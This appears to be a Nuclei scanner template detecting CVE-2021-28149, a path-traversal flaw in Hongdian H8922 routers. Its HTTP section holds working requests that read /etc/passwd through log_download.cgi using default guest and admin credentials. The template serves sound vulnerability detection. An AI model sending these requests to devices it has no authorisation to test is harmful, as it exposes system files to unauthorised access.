id: CVE-2021-28149 info: name: Hongdian H8922 3.0.5 Devices - Local File Inclusion author: gy741 severity: medium description: | Hongdian H8922 3.0.5 devices are vulnerable to local file inclusion. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd) This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file. remediation: | Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in Hongdian H8922 3.0.5 Devices. reference: - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - http://en.hongdian.com/Products/Details/H8922 - https://nvd.nist.gov/vuln/detail/CVE-2021-28149 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2021-28149 cwe-id: CWE-22 epss-score: 0.06892 epss-percentile: 0.93137 cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:* metadata: max-request: 2 vendor: hongdian product: h8922_firmware tags: cve,cve2021,hongdian,traversal http: - raw: - | GET /log_download.cgi?type=../../etc/passwd HTTP/1.1 Host: {{Hostname}} Cache-Control: max-age=0 Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= - | GET /log_download.cgi?type=../../etc/passwd HTTP/1.1 Host: {{Hostname}} Authorization: Basic YWRtaW46YWRtaW4= matchers-condition: and matchers: - type: word part: header words: - "application/octet-stream" - type: regex part: body regex: - "root:.*:0:0:" - "sshd:[x*]" - "root:[$]" - type: status status: - 200 # digest: 4a0a0047304502210089c20bab5825c5172cbef7f7b42fe4bdd15c8948c5bb852aa9aeb362ab891795022016a54a7abb58aab2d0cac63bcf6e0ef7b36c8c850c54679efc13609ada39e82f:922c64590222798bb761d5b6d8e72950